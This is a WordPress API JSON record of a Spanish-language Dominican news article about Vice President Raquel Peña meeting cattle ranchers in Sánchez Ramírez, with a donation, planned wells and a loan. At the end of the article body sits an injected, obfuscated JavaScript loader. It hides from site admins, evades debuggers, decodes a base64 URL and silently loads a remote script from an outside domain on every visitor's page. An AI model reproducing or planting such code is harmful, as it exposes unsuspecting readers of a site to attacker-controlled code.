{"id":13532,"date":"2023-01-23T10:05:05","date_gmt":"2023-01-23T14:05:05","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13532"},"modified":"2023-01-23T10:05:05","modified_gmt":"2023-01-23T14:05:05","slug":"vicepresidenta-afirma-gobierno-de-abinader-es-el-que-ha-destinado-mas-apoyo-y-recursos-al-sector-agropecuario-y-ganadero","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13532","title":{"rendered":"Vicepresidenta afirma Gobierno de Abinader es el que ha destinado m\u00e1s apoyo y recursos al sector agropecuario y ganadero"},"content":{"rendered":"<p>Cotu\u00ed, S\u00e1nchez Ram\u00edrez. &#8211;\u00a0<strong>La Vicepresidenta de la Rep\u00fablica, Raquel Pe\u00f1a,<\/strong>\u00a0encabez\u00f3 hoy un\u00a0<strong>encuentro-almuerzo con representantes del sector ganadero<\/strong>\u00a0de esta provincia, donde destac\u00f3 que no ha existido un Gobierno en la historia de la Rep\u00fablica Dominicana, como el que encabeza el Presidente Luis Abinader, que haya destinado\u00a0<strong>m\u00e1s apoyo, m\u00e1s fondos, m\u00e1s atenci\u00f3n personalizada al sector agropecuario y ganadero.<\/strong><\/p>\n<p><em>\u00abNo ha existido un Gobierno en la historia de la Rep\u00fablica Dominicana, como el que encabeza el Presidente Luis Abinader que haya destinado m\u00e1s apoyo, m\u00e1s fondos, m\u00e1s atenci\u00f3n personalizada de un Presidente directamente con todas las cooperativas, con todas las asociaciones, con todos sus l\u00edderes, con todos sus dirigentes\u00bb,<\/em>\u00a0asegur\u00f3 Pe\u00f1a en el encuentro con ganaderos de la provincia.<\/p>\n<p><strong>Pe\u00f1a record\u00f3 que viene del sector agropecuario.\u00a0<\/strong><em>\u00abYo s\u00e9 lo que es el campo. Yo s\u00e9 el trabajo que se pasa en el campo y si no se cuenta con el apoyo central\u00bb.<\/em><\/p>\n<p>La Vicepresidenta tambi\u00e9n entreg\u00f3 un cheque en\u00a0<strong>donaci\u00f3n<\/strong>\u00a0a la Asociaci\u00f3n de Ganaderos de la provincia de S\u00e1nchez Ram\u00edrez, por un monto de\u00a0<strong>RD<\/strong>\u00a0<strong>797,826.11 para la energ\u00eda el\u00e9ctrica de dicho gremio.<\/strong><\/p>\n<p>En respuesta a las peticiones de los ganaderos, la vicemandataria anunci\u00f3 que en los pr\u00f3ximos d\u00edas,\u00a0<strong>unos diez pozos de agua ser\u00e1n intervenidos<\/strong>\u00a0en la Provincia S\u00e1nchez Ram\u00edrez para beneficio de los ganaderos.<\/p>\n<p>De igual forma, dar\u00e1n respuesta a las\u00a0<strong>peticiones de t\u00edtulos de propiedad<\/strong>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/WhatsApp20Image202023-01-2220at206.17.3320PM.jpg\" alt=\"\" width=\"1600\" height=\"1066\" data-entity-type=\"file\" data-entity-uuid=\"6d5fcbf5-59c2-4cc9-9f4a-3275ab91ad0d\" \/><\/p>\n<p>De su lado, el asesor agropecuario del Poder Ejecutivo y presidente de la Asociaci\u00f3n Dominicana de Productores de Leche\u00a0<strong>(Aproleche), Erick Rivero<\/strong>, resalt\u00f3 que en la provincia S\u00e1nchez Ram\u00edrez naci\u00f3 el Proyecto de Mejoramiento de la Ganader\u00eda en Rep\u00fablica Dominicana\u00a0<strong>(PROMEGAN)<\/strong>.<\/p>\n<p>De igual forma, destac\u00f3 las diferentes medidas que viene ejecutando el Gobierno dominicano en favor del sector agropecuario y ganadero, entre las que cit\u00f3 el hecho de que\u00a0<strong>la leche utilizada en el desayuno escolar es natural, producida en el pa\u00eds.<\/strong><\/p>\n<p>Rivero anunci\u00f3 que a trav\u00e9s del Banco Agr\u00edcola se realizar\u00e1 el aporte de un\u00a0<strong>pr\u00e9stamo de 50 millones de pesos a la Cooperativa Agropecuaria de S\u00e1nchez Ram\u00edrez<\/strong>\u00a0para su mejor funcionamiento.<\/p>\n<p>Por su parte,\u00a0<strong>la presidenta de la Asociaci\u00f3n de Ganaderos de S\u00e1nchez Ram\u00edrez, Yolanda Castro,\u00a0<\/strong>resalt\u00f3 la presencia de la Vicepresidenta de la Rep\u00fablica en la provincia.<\/p>\n<p>Asimismo, el\u00a0<strong>ganadero Juan P\u00e9rez Volquez, en representaci\u00f3n de la Cooperativa Agropecuaria de S\u00e1nchez Ram\u00edrez<\/strong>, que funciona desde hace 27 a\u00f1os y tiene 115 miembros, realiz\u00f3 la petici\u00f3n de\u00a0<strong>los arreglos de los caminos vecinales y la realizaci\u00f3n de pozos tubulares.<\/strong><\/p>\n<p>Tambi\u00e9n el ganadero Alixander Gonz\u00e1lez, realiz\u00f3 la petici\u00f3n de los t\u00edtulos de propiedad para sus tierras.<\/p>\n<p>Estuvieron presentes, el senador por la provincia S\u00e1nchez Ram\u00edrez, Ricardo de los Santos; el tesorero nacional, Luis Delgado; el director del INDRHI, Olmedo Caba; el alcalde municipal de Cotu\u00ed, Bienvenido Lazala; la gobernadora provincial, Cristiana Rodr\u00edguez, junto a los diputados Sadoky Duarte y Gerardo Concepci\u00f3n.<\/p>\n<p>Tambi\u00e9n, el director de Inespre, Iv\u00e1n Hern\u00e1ndez; el administrador del Banco Agr\u00edcola, Fernando Dur\u00e1n; el presidente de Conaleche, Miguel Laureano, y el de Ganader\u00eda, Geovanny Molina.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cotu\u00ed, S\u00e1nchez Ram\u00edrez. &#8211;\u00a0La Vicepresidenta de la Rep\u00fablica, Raquel Pe\u00f1a,\u00a0encabez\u00f3 hoy un\u00a0encuentro-almuerzo con representantes del sector ganadero\u00a0de esta provincia, donde destac\u00f3 que no ha existido un Gobierno en la historia de la Rep\u00fablica Dominicana, como el que encabeza el Presidente Luis Abinader, que haya destinado\u00a0m\u00e1s apoyo, m\u00e1s fondos, m\u00e1s atenci\u00f3n personalizada al sector agropecuario y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13534,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13532","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13532","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13532"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13532\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13534"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13532"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13532"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13532"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}